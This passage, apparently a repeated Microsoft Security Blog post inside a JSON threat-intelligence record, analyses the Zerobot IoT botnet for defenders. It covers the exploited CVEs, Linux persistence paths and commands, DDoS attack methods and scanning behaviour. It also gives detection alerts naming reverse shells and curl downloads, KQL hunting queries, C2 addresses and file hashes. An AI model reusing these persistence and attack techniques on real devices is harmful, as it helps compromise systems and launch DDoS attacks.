\nHTTP_BYPASS| Sends HTTP GET requests with spoofed headers. \nHTTP_NULL| HTTP headers are each one random byte (not necessarily ascii). \n \nPreviously undisclosed and new capabilities are the following:\n\n**Attack method**| **Description** \n---|--- \nUDP_RAW| Sends UDP packets where the payload is customizable. \nICMP_FLOOD| Supposed to be an ICMP flood, but the packet is built incorrectly. \nTCP_CUSTOM| Sends TCP packets where the payload and flags are fully customizable. \nTCP_SYN| Sends SYN packets. \nTCP_ACK| Sends ACK packets. \nTCP_SYNACK| Sends SYN-ACK packets. \nTCP_XMAS| Christmas tree attack (all TCP flags are set). The reset cause field is \u201cxmas\u201d. \n \n## How Zerobot spreads\n\nAfter persistence is achieved, Zerobot scans for other internet-exposed devices to infect. The malware randomly generates a number between 0 and 255 and scans all IPs starting with this value. Using a function called _new_botnet_selfRepo_isHoneypot_, the malware tries to identify honeypot IP addresses, which are used by network decoys to attract cyberattacks and collect information on threats and attempts to access resources. This function includes 61 IP subnets, preventing scanning of these IPs.\n\nMicrosoft researchers also identified a sample that can run on Windows based on a cross-platform (Linux, Windows, macOS) open-source remote administration tool (RAT) with various features such as managing processes, file operations, screenshotting, and running commands. This tool was found by investigating the command-and-control (C2) IPs used by the malware. The script, which is used to download this RAT, is called _impst.sh_:\n\nFigure 1. The _impst.sh_ script used to download the remote administration tool\n\n## Defending devices and networks against Zerobot\n\nThe continuous evolution and rapid addition of new capabilities in the latest Zerobot version underscores the urgency of implementing comprehensive security measures. Microsoft recommends the following steps to protect devices and networks against the threat of Zerobot:\n\n * Use security solutions with cross-domain visibility and detection capabilities like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), which provides integrated defense across endpoints, identities, email, applications, and data. Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect Zerobot malware variants and malicious behavior related to this threat.\n * Adopt a comprehensive IoT security solution such as [Microsoft Defender for IoT](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-iot>) to allow visibility and monitoring of all IoT and OT devices, threat detection and response, and integration with SIEM/SOAR and XDR platforms such as Microsoft Sentinel and Microsoft 365 Defender.\n * Ensure secure configurations for devices: Change the default password to a strong one, and block SSH from external access.\n * Maintain device health with updates: Make sure devices are up to date with the latest firmware and patches.\n * Use least privileges access: Use a secure virtual private network (VPN) service for remote access and restrict remote access to the device.\n * Harden endpoints with a comprehensive Windows security solution:\n * Manage the apps your employees can use through Windows Defender Application Control and for unmanaged solutions, enabling Smart App Control.\n * Perform timely cleanup of all unused and stale executables sitting on yours or your organizations\u2019 devices.\n\n## Detections\n\n**Microsoft Defender for IoT**\n\nMicrosoft Defender for IoT uses detection rules and signatures to identify malicious behavior. Microsoft Defender for IoT has alerts for the following vulnerabilities and exploits which may be tied to Zerobot activity:\n\n * CVE-2014-8361\n * CVE-2016-20017\n * CVE-2017-17105\n * CVE-2017-17215\n * CVE-2018-10561\n * CVE-2018-20057\n * CVE-2019-10655\n * CVE-2020-7209\n * CVE-2020-10987\n * CVE-2020-25506\n * CVE-2021-35395\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2021-46422\n * CVE-2022-22965\n * CVE-2022-25075\n * CVE-2022-26186\n * CVE-2022-26210\n * CVE-2022-30023\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-33891\n * CVE-2022-34538\n * CVE-2022-37061\n * ZERO-36290\n * ZSL-2022-5717\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects the malicious files under the following platforms and threat names:\n\n * Zerobot (Win32/64 and Linux)\n * SparkRat (Win32/64 and Linux)\n\n**Microsoft Defender for Endpoint**\n\nMicrosoft Defender for Endpoint alerts with the following titles can indicate threat activity on your network:\n\n * DEV-1061 threat activity group detected\n * An active &#x27;PrivateLoader&#x27; malware process was detected while executing\n * &#x27;Morila&#x27; malware was prevented\n * &#x27;Multiverze&#x27; malware was detected\n\nMicrosoft Defender for Endpoint also has detections for the following vulnerabilities exploited by Zerobot:\n\n * CVE-2022-22965 (Spring4Shell)\n\nMicrosoft Defender for Endpoint&#x27;s Device Discovery capabilities discover and classify devices. With these capabilities, Microsoft 365 Defender customers using Microsoft Defender for IoT have visibility into security recommendations for devices with the following vulnerabilities:\n\n * CVE-2014-8361\n * CVE-2019-10655\n * CVE-2020-25506\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-37061\n\nDevices with these vulnerabilities are also visible in the Microsoft Defender Vulnerability Management inventory.\n\n**Microsoft Defender for Cloud**\n\nMicrosoft Defender for Cloud alerts with the following titles can indicate threat activity on your network:\n\n * VM_ReverseShell\n * VM_SuspectDownloadArtifacts\n * SQL.VM_ShellExternalSourceAnomaly\n * AppServices_CurlToDisk\n\n## Advanced hunting queries\n\n### **Microsoft 365 Defender**\n\nMicrosoft 365 Defender customers can run the following query to find related activity in their networks.\n\n**Zerobot files**\n\nThis query finds the file hashes associated with Zerobot activity.\n \n \n let IoCList = externaldata(TimeGenerated:datetime,IoC:string,IoC_Type:string,ExpirationDateTime:datetime,Description:string, Action:string, ConfidenceScore:real, ThreatType:string, Active:string,Type:string, TrafficLightProtocolLevel:string, \n ActivityGroupNames:string)[@\"https://raw.githubusercontent.com/microsoft/mstic/master/RapidReleaseTI/Indicators.csv\"] \n with(format=\"csv\", ignoreFirstRecord=True);\n let shahashes = IoCList\n | where IoC_Type =~ \"sha256\" and Description =~ \"Dev-1061 Zerobot affecting IoT devices\"\n | distinct IoC;\n DeviceFileEvents\n | where SHA256 in (shahashes)\n\n**Zerobot HTTP requests**\n\nThis query finds suspicious HTTP requests originated by the IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"NetworkSignatureInspected\"\n | where Timestamp > ago(30d)\n |extend json = parse_json(AdditionalFields)\n | extend SignatureName =tostring(json.SignatureName), SignatureMatchedContent = tostring(json.SignatureMatchedContent), SignatureSampleContent = tostring(json.SamplePacketContent)\n |where SignatureName == \"HTTP_Client\"\n |project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, SignatureName, SignatureMatchedContent, SignatureSampleContent\n \n\n**Zerobot port knocking**\n\nThis query finds incoming connections from IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"InboundConnectionAccepted\"\n | where Timestamp > ago(30d)\n |project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, InitiatingProcessFileName\n \n\n### **Microsoft Sentinel**\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u2018TI map\u2019) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>\n\n## Indicators of compromise (IOCs):\n\n**Domains and IP addresses:**\n\n * zero[.]sudolite[.]ml\n * 176.65.137[.]5\n * 176.65.137[.]5:1401\n * 176.65.137[.]6\n * ws[:]//176.65.137[.]5/handle\n * http[:]//176.65.137[.]5:8000/ws\n\n**New Zerobot hashes (SHA-256)**\n\n * aed95a8f5822e9b1cd1239abbad29d3c202567afafcf00f85a65df4a365bedbb\n * bf582b5d470106521a8e7167a5732f7e3a4330d604de969eb8461cbbbbdd9b9a\n * 0a5eebf19ccfe92a2216c492d6929f9cac72ef37089390572d4e21d0932972c8\n * 1e7ca210ff7bedeefadb15a9ec5ea68ad9022d0c6f41c4e548ec2e5927026ba4\n * 05b7517cb05fe1124dd0fad4e85ddf0fe65766a4c6c9986806ae98a427544e9d\n * 5625d41f239e2827eb05bfafde267109549894f0523452f7a306b53b90e847f2\n * c304a9156a032fd451bff49d75b0e9334895604549ab6efaab046c5c6461c8b3\n * 66c76cfc64b7a5a06b6a26976c88e24e0518be3554b5ae9e3475c763b8121792\n * 539640a482aaee2fe743502dc59043f11aa8728ce0586c800193e30806b2d0e5\n * 0f0ba8cc3e46fff0eef68ab5f8d3010241e2eea7ee795e161f05d32a0bf13553\n * 343c9ca3787bf763a70ed892dfa139ba69141b61c561c128084b22c16829c5af\n * 874b0691378091a30d1b06f2e9756fc7326d289b03406023640c978ff7c87712\n * 29eface0054da4cd91c72a0b2d3cda61a02831b4c273e946d7e106254a6225a7\n * 4a4cb8516629c781d5557177d48172f4a7443ca1f826ea2e1aa6132e738e6db2\n * bdfd89bdf6bc2de5655c3fe5f6f4435ec4ad37262e3cc72d8cb5204e1273ccd6\n * 62f23fea8052085d153ac7b26dcf0a15fad0c27621f543cf910e37f8bf822e0e\n * 788e15fd87c45d38629e3e715b0cb93e55944f7c4d59da2e480ffadb6b981571\n * 26e68684f5b76d9016d4f02b8255ff52d1b344416ffc19a2f5c793ff1c2fdc65\n * e4840c5ac2c2c2170d00feadb5489c91c2943b2aa13bbec00dbcffc4ba8dcc2d\n * 45059f26e32da95f4bb5dababae969e7fceb462cdeadf7d141c39514636b905a\n * 77dd28a11e3e4260b9a9b60d58cb6aaaf2147da28015508afbaeda84c1acfe70\n * cf232e7d39094c9ba04b9713f48b443e9d136179add674d62f16371bf40cf8c8\n * 13657b64a2ac62f9d68aeb75737cca8f2ab9f21e4c38ce04542b177cb3a85521\n * eb33c98add35f6717a3afb0ab2f9c0ee30c6f4e0576046be9bf4fbf9c5369f71\n * e3dd20829a34caab7f1285b730e2bb0c84c90ac1027bd8e9090da2561a61ab17\n * 3685d000f6a884ca06f66a3e47340e18ff36c16b1badb80143f99f10b8a33768\n * cdc28e7682f9951cbe2e55dad8bc2015c1591f89310d8548c0b7a1c65dbefae3\n * 869f4fb3f185b2d1231d9378273271ddfeebb53085daede89989f9cc8d364f5f\n * 6c59af3ed1a616c238ee727f6ed59e962db70bc5a418b20b24909867eb00a9d6\n * ef28ee3301e97eefd2568a3cb4b0f737c5f31983710c75b70d960757f2def74e\n * 95e4cc13f8388c195a1220cd44d26fcb2e10b7b8bfc3d69efbc51beb46176ff1\n * 62f9eae8a87f64424df90c87dd34401fe7724c87a394d1ba842576835ab48afc\n * 54d1daf58ecd4d8314b791a79eda2258a69d7c69a5642b7f5e15f2210958bdce\n * 8176991f355db10b32b7562d1d4f7758a23c7e49ed83984b86930b94ccc46ab3\n * 8aa89a428391683163f0074a8477d554d6c54cab1725909c52c41db2942ac60f\n * fd65bd8ce671a352177742616b5facc77194cccec7555a2f90ff61bad4a7a0f6\n * 1e66ee40129deccdb6838c2f662ce33147ad36b1e942ea748504be14bb1ee0ef\n * 57f83ca864a2010d8d5376c68dc103405330971ade26ac920d6c6a12ea728d3d\n * 7bfd0054aeb8332de290c01f38b4b3c6f0826cf63eef99ddcd1a593f789929d6\n\n****SparkRat** hashes (SHA-256): **\n\n * 0ce7bc2b72286f236c570b1eb1c1eacf01c383c23ad76fd8ca51b8bc123be340\n * cacb77006b0188d042ce95e0b4d46f88828694f3bf4396e61ae7c24c2381c9bf\n * 65232e30bb8459961a6ab2e9af499795941c3d06fdd451bdb83206a00b1b2b88\n\n_**Rotem Sde-Or**, **Ilana Sivan**, **Gil Regev**, Microsoft Defender for IoT Research Team \n**Meitar Pinto**, **Nimrod Roimy**, **Nir Avnery**, Microsoft Defender Research Team \n**Ramin Nafisi**, **Ross Bevington**, Microsoft Threat Intelligence Center (MSTIC)_\n\nThe post [Microsoft research uncovers new Zerobot capabilities](<https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-21T20:00:00", "type": "mssecure", "title": "Microsoft research uncovers new Zerobot capabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361", "CVE-2016-20017", "CVE-2017-17105", "CVE-2017-17106", "CVE-2017-17215", "CVE-2018-10561", "CVE-2018-12613", "CVE-2018-20057", "CVE-2019-10655", "CVE-2020-10987", "CVE-2020-25223", "CVE-2020-25506", "CVE-2020-7209", "CVE-2021-35395", "CVE-2021-36260", "CVE-2021-42013", "CVE-2021-46422", "CVE-2022-22965", "CVE-2022-25075", "CVE-2022-26186", "CVE-2022-26210", "CVE-2022-30023", "CVE-2022-30525", "CVE-2022-31137", "CVE-2022-33891", "CVE-2022-34538", "CVE-2022-37061", "CVE-2022-42013"], "modified": "2022-12-21T20:00:00", "id": "MSSECURE:0FBB61490D4A94C83AEE14DDEE722297", "href": "https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2022-12-21T20:35:18", "description": "Botnet malware operations are a constantly evolving threat to devices and networks. Threat actors target Internet of Things (IoT) devices for recruitment into malicious operations as IoT devices\u2019 configurations often leave them exposed, and the number of internet-connected devices continue to grow. Recent trends have shown that operators are redeploying malware for a variety of distributions and objectives, modifying existing botnets to scale operations and add as many devices as possible to their infrastructure.\n\nZerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware. The Microsoft Defender for IoT research team has been monitoring Zerobot (also called ZeroStresser by its operators) for months. Zerobot is offered as part of a malware as a service scheme and has been updated several times since Microsoft started to track it. One domain with links to Zerobot was among several domains associated with DDoS-for-hire services [seized by the FBI](<https://www.justice.gov/usao-cdca/pr/federal-prosecutors-los-angeles-and-alaska-charge-6-defendants-operating-websites>) in December 2022.\n\nMicrosoft has previously reported on the [evolving threat ecosystem](<https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>). The shift toward malware as a service in the cyber economy has industrialized attacks and has made it easier for attackers to purchase and use malware, establish and maintain access to compromised networks, and utilize ready-made tools to perform their attacks. We have tracked advertisements for the Zerobot botnet on various social media networks in addition to other announcements regarding the sale and maintenance of the malware, as well as new capabilities in development.\n\nIn this blog post, we present information about the latest version of the malware, Zerobot 1.1, including newly identified capabilities and further context to Fortinet\u2019s recent [analysis](<https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities>) on the threat. Zerobot 1.1 increases its capabilities with the inclusion of new attack methods and new exploits for supported architectures, expanding the malware\u2019s reach to different types of devices. In addition to these findings, we\u2019re sharing new indicators of compromise (IOCs) and recommendations to help defenders protect devices and networks against this threat.\n\n## What is Zerobot?\n\nZerobot affects a variety of devices that include firewall devices, routers, and cameras, adding compromised devices to a distributed denial of service (DDoS) botnet. Using several modules, the malware can infect vulnerable devices built on diverse architectures and operating systems, find additional devices to infect, achieve persistence, and attack a range of protocols. Microsoft tracks this activity as DEV-1061.\n\nThe most recent distribution of Zerobot includes additional capabilities, such as exploiting vulnerabilities in Apache and Apache Spark (CVE-2021-42013 and CVE-2022-33891 respectively), and new DDoS attack capabilities.\n\nMicrosoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing Microsoft to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. Once it meets defined criteria, a DEV group is converted to a named actor.\n\n## How Zerobot gains and maintains device access\n\nIoT devices are often internet-exposed, leaving unpatched and improperly secured devices vulnerable to exploitation by threat actors. Zerobot is capable of propagating through brute force attacks on vulnerable devices with insecure configurations that use default or weak credentials. The malware may attempt to gain device access by using a combination of eight common usernames and 130 passwords for IoT devices over SSH and telnet on ports 23 and 2323 to spread to devices. Microsoft researchers identified numerous SSH and telnet connection attempts on default ports 22 and 23, as well as attempts to open ports and connect to them by port-knocking on ports 80, 8080, 8888, and 2323.\n\nIn addition to brute force attempts on devices, Zerobot exploits dozens of vulnerabilities, which malware operators add on a rolling basis to gain access and inject malicious payloads. Zerobot 1.1 includes several new vulnerabilities, such as:\n\n**Vulnerability**| **Affected software** \n---|--- \nCVE-2017-17105| Zivif PR115-204-P-RS \nCVE-2019-10655| Grandstream \nCVE-2020-25223| WebAdmin of Sophos SG UTM \nCVE-2021-42013| Apache \nCVE-2022-31137| Roxy-WI \nCVE-2022-33891| Apache Spark \nZSL-2022-5717| MiniDVBLinux \n \nSince the release of Zerobot 1.1, the malware operators have removed CVE-2018-12613, a phpMyAdmin vulnerability that could allow threat actors to view or execute files. Microsoft researchers have also identified that previous reports have used the vulnerability ID \u201cZERO-32906\u201d for CVE-2018-20057, \u201cGPON\u201d for CVE-2018-10561, and \u201cDLINK\u201d for CVE-2016-20017; and that CVE-2020-7209 was mislabeled as CVE-2017-17106 and CVE-2022-42013 was mislabeled as CVE-2021-42013.\n\nMicrosoft researchers have also found new evidence that Zerobot propagates by compromising devices with known vulnerabilities that are not included in the malware binary, such as CVE-2022-30023, a command injection vulnerability in Tenda GPON AC1200 routers.\n\nUpon gaining device access, Zerobot injects a malicious payload, which may be a generic script called _zero.sh _that downloads and attempts to execute Zerobot, or a script that downloads the Zerobot binary of a specific architecture. The bash script that attempts to download different Zerobot binaries tries to identify the architecture by brute-force, attempting to download and execute binaries of various architectures until it succeeds, as IoT devices are based on many computer processing units (CPUs). Microsoft has observed scripts targeting various architectures including ARM64, MIPS, and x86_64.\n\nDepending on the operating system of the device, the malware has different persistence mechanisms. Persistence tactics are used by malware operators to obtain and maintain access to devices. While Zerobot is unable to spread to Windows machines, we have found several samples that can run on Windows. On Windows machines, the malware copies itself to the Startup folder with the file name _FireWall.exe_ (older versions use _my.exe)_. Microsoft Defender for Endpoint detects this malware and related malicious activity on both Windows and Linux devices. See detection details below.\n\nTo achieve persistence on Linux-based devices, Zerobot uses a combination of desktop entry, daemon, and service methods:\n\n**Desktop entry:**\n\nZerobot copies itself to _$HOME/.config/ssh.service/sshf_ then writes a desktop entry file called _sshf.desktop_ to the same directory. Older Linux versions use _$HOME/.config/autostart_ instead of _$HOME/.config/ssh.service_.\n\n**Daemon:**\n\nCopies itself to _/usr/bin/sshf_ and writes a configuration at _/etc/init/sshf.conf_.\n\n**Service:**\n\nCopies itself to _/etc/sshf_ and writes a service configuration at _/lib/system/system/sshf.service_, then enables the service (to make sure it starts at boot) with two commands:\n\n * _systemctl enable sshf_\n * _service enable sshf_\n\nAll persistence mechanisms on older Linux versions use _my.bin_ and _my.bin.desktop_ instead of _sshf_ and _sshf.desktop._\n\n## New attack capabilities\n\nIn addition to the functions and attacks included in previous versions of the malware, Zerobot 1.1 has additional DDoS attack capabilities. These functions allow threat actors to target resources and make them inaccessible. Successful DDoS attacks may be used by threat actors to extort ransom payments, distract from other malicious activities, or disrupt operations. In almost every attack, the destination port is customizable, and threat actors who purchase the malware can modify the attack according to their target.\n\nThe following are the previously known Zerobot capabilities:\n\n**Attack method**| **Description** \n---|--- \nUDP_LEGIT| Sends UDP packets without data. \nMC_PING| Meant for DDoS on Minecraft servers. Sends a handshake and status request. \nTCP_HANDSHAKE| Floods with TCP handshakes. \nTCP_SOCKET| Continuously sends random payloads on an open TCP socket. Payload length is customizable. \nTLS_SOCKET| Continuously sends random payloads on an open TLS socket. Payload length is customizable. \nHTTP_HANDLE| Sends HTTP GET requests using a Golang standard library. \nHTTP_RAW| Formats and sends HTTP GET requests. \nHTTP_BYPASS| Sends HTTP GET requests with spoofed headers. \nHTTP_NULL| HTTP headers are each one random byte (not necessarily ascii). \n \nPreviously undisclosed and new capabilities are the following:\n\n**Attack method**| **Description** \n---|--- \nUDP_RAW| Sends UDP packets where the payload is customizable. \nICMP_FLOOD| Supposed to be an ICMP flood, but the packet is built incorrectly. \nTCP_CUSTOM| Sends TCP packets where the payload and flags are fully customizable. \nTCP_SYN| Sends SYN packets. \nTCP_ACK| Sends ACK packets. \nTCP_SYNACK| Sends SYN-ACK packets. \nTCP_XMAS| Christmas tree attack (all TCP flags are set). The reset cause field is \u201cxmas\u201d. \n \n## How Zerobot spreads\n\nAfter persistence is achieved, Zerobot scans for other internet-exposed devices to infect. The malware randomly generates a number between 0 and 255 and scans all IPs starting with this value. Using a function called _new_botnet_selfRepo_isHoneypot_, the malware tries to identify honeypot IP addresses, which are used by network decoys to attract cyberattacks and collect information on threats and attempts to access resources. This function includes 61 IP subnets, preventing scanning of these IPs.\n\nMicrosoft researchers also identified a sample that can run on Windows based on a cross-platform (Linux, Windows, macOS) open-source remote administration tool (RAT) with various features such as managing processes, file operations, screenshotting, and running commands. This tool was found by investigating the command-and-control (C2) IPs used by the malware. The script, which is used to download this RAT, is called _impst.sh_:\n\nFigure 1. The _impst.sh_ script used to download the remote administration tool\n\n## Defending devices and networks against Zerobot\n\nThe continuous evolution and rapid addition of new capabilities in the latest Zerobot version underscores the urgency of implementing comprehensive security measures. Microsoft recommends the following steps to protect devices and networks against the threat of Zerobot:\n\n * Use security solutions with cross-domain visibility and detection capabilities like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), which provides integrated defense across endpoints, identities, email, applications, and data. Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect Zerobot malware variants and malicious behavior related to this threat.\n * Adopt a comprehensive IoT security solution such as [Microsoft Defender for IoT](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-iot>) to allow visibility and monitoring of all IoT and OT devices, threat detection and response, and integration with SIEM/SOAR and XDR platforms such as Microsoft Sentinel and Microsoft 365 Defender.\n * Ensure secure configurations for devices: Change the default password to a strong one, and block SSH from external access.\n * Maintain device health with updates: Make sure devices are up to date with the latest firmware and patches.\n * Use least privileges access: Use a secure virtual private network (VPN) service for remote access and restrict remote access to the device.\n * Harden endpoints with a comprehensive Windows security solution:\n * Manage the apps your employees can use through Windows Defender Application Control and for unmanaged solutions, enabling Smart App Control.\n * Perform timely cleanup of all unused and stale executables sitting on yours or your organizations\u2019 devices.\n\n## Detections\n\n**Microsoft Defender for IoT**\n\nMicrosoft Defender for IoT uses detection rules and signatures to identify malicious behavior. Microsoft Defender for IoT has alerts for the following vulnerabilities and exploits which may be tied to Zerobot activity:\n\n * CVE-2014-8361\n * CVE-2016-20017\n * CVE-2017-17105\n * CVE-2017-17215\n * CVE-2018-10561\n * CVE-2018-20057\n * CVE-2019-10655\n * CVE-2020-7209\n * CVE-2020-10987\n * CVE-2020-25506\n * CVE-2021-35395\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2021-46422\n * CVE-2022-22965\n * CVE-2022-25075\n * CVE-2022-26186\n * CVE-2022-26210\n * CVE-2022-30023\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-33891\n * CVE-2022-34538\n * CVE-2022-37061\n * ZERO-36290\n * ZSL-2022-5717\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects the malicious files under the following platforms and threat names:\n\n * Zerobot (Win32/64 and Linux)\n * SparkRat (Win32/64 and Linux)\n\n**Microsoft Defender for Endpoint**\n\nMicrosoft Defender for Endpoint alerts with the following titles can indicate threat activity on your network:\n\n * DEV-1061 threat activity group detected\n * An active &#x27;PrivateLoader&#x27; malware process was detected while executing\n * &#x27;Morila&#x27; malware was prevented\n * &#x27;Multiverze&#x27; malware was detected\n\nMicrosoft Defender for Endpoint also has detections for the following vulnerabilities exploited by Zerobot:\n\n * CVE-2022-22965 (Spring4Shell)\n\nMicrosoft Defender for Endpoint&#x27;s Device Discovery capabilities discover and classify devices. With these capabilities, Microsoft 365 Defender customers using Microsoft Defender for IoT have visibility into security recommendations for devices with the following vulnerabilities:\n\n * CVE-2014-8361\n * CVE-2019-10655\n * CVE-2020-25506\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-37061\n\nDevices with these vulnerabilities are also visible in the Microsoft Defender Vulnerability Management inventory.\n\n**Microsoft Defender for Cloud**\n\nMicrosoft Defender for Cloud alerts with the following titles can indicate threat activity on your network:\n\n * VM_ReverseShell\n * VM_SuspectDownloadArtifacts\n * SQL.VM_ShellExternalSourceAnomaly\n * AppServices_CurlToDisk\n\n## Advanced hunting queries\n\n### **Microsoft 365 Defender**\n\nMicrosoft 365 Defender customers can run the following query to find related activity in their networks.\n\n**Zerobot files**\n\nThis query finds the file hashes associated with Zerobot activity.\n \n \n let IoCList = externaldata(TimeGenerated:datetime,IoC:string,IoC_Type:string,ExpirationDateTime:datetime,Description:string, Action:string, ConfidenceScore:real, ThreatType:string, Active:string,Type:string, TrafficLightProtocolLevel:string, \n ActivityGroupNames:string)[@\"https://raw.githubusercontent.com/microsoft/mstic/master/RapidReleaseTI/Indicators.csv\"] \n with(format=\"csv\", ignoreFirstRecord=True);\n let shahashes = IoCList\n | where IoC_Type =~ \"sha256\" and Description =~ \"Dev-1061 Zerobot affecting IoT devices\"\n | distinct IoC;\n DeviceFileEvents\n | where SHA256 in (shahashes)\n\n**Zerobot HTTP requests**\n\nThis query finds suspicious HTTP requests originated by the IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"NetworkSignatureInspected\"\n | where Timestamp > ago(30d)\n |extend json = parse_json(AdditionalFields)\n | extend SignatureName =tostring(json.SignatureName), SignatureMatchedContent = tostring(json.SignatureMatchedContent), SignatureSampleContent = tostring(json.SamplePacketContent)\n |where SignatureName == \"HTTP_Client\"\n |project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, SignatureName, SignatureMatchedContent, SignatureSampleContent\n \n\n**Zerobot port knocking**\n\nThis query finds incoming connections from IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"InboundConnectionAccepted\"\n | where Timestamp > ago(30d)\n |project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, InitiatingProcessFileName\n \n\n### **Microsoft Sentinel**\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u2018TI map\u2019) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>\n\n## Indicators of compromise (IOCs):\n\n**Domains and IP addresses:**\n\n * zero[.]sudolite[.]ml\n * 176.65.137[.]5\n * 176.65.137[.]5:1401\n * 176.65.137[.]6\n * ws[:]//176.65.137[.]5/handle\n * http[:]//176.65.137[.]5:8000/ws\n\n**New Zerobot hashes (SHA-256)**\n\n * aed95a8f5822e9b1cd1239abbad29d3c202567afafcf00f85a65df4a365bedbb\n * bf582b5d470106521a8e7167a5732f7e3a4330d604de969eb8461cbbbbdd9b9a\n * 0a5eebf19ccfe92a2216c492d6929f9cac72ef37089390572d4e21d0932972c8\n * 1e7ca210ff7bedeefadb15a9ec5ea68ad9022d0c6f41c4e548ec2e5927026ba4\n * 05b7517cb05fe1124dd0fad4e85ddf0fe65766a4c6c9986806ae98a427544e9d\n * 5625d41f239e2827eb05bfafde267109549894f0523452f7a306b53b90e847f2\n * c304a9156a032fd451bff49d75b0e9334895604549ab6efaab046c5c6461c8b3\n * 66c76cfc64b7a5a06b6a26976c88e24e0518be3554b5ae9e3475c763b8121792\n * 539640a482aaee2fe743502dc59043f11aa8728ce0586c800193e30806b2d0e5\n * 0f0ba8cc3e46fff0eef68ab5f8d3010241e2eea7ee795e161f05d32a0bf13553\n * 343c9ca3787bf763a70ed892dfa139ba69141b61c561c128084b22c16829c5af\n * 874b0691378091a30d1b06f2e9756fc7326d289b03406023640c978ff7c87712\n * 29eface0054da4cd91c72a0b2d3cda61a02831b4c273e946d7e106254a6225a7\n * 4a4cb8516629c781d5557177d48172f4a7443ca1f826ea2e1aa6132e738e6db2\n * bdfd89bdf6bc2de5655c3fe5f6f4435ec4ad37262e3cc72d8cb5204e1273ccd6\n * 62f23fea8052085d153ac7b26dcf0a15fad0c27621f543cf910e37f8bf822e0e\n * 788e15fd87c45d38629e3e715b0cb93e55944f7c4d59da2e480ffadb6b981571\n * 26e68684f5b76d9016d4f02b8255ff52d1b344416ffc19a2f5c793ff1c2fdc65\n * e4840c5ac2c2c2170d00feadb5489c91c2943b2aa13bbec00dbcffc4ba8dcc2d\n * 45059f26e32da95f4bb5dababae969e7fceb462cdeadf7d141c39514636b905a\n * 77dd28a11e3e4260b9a9b60d58cb6aaaf2147da28015508afbaeda84c1acfe70\n * cf232e7d39094c9ba04b9713f48b443e9d136179add674d62f16371bf40cf8c8\n * 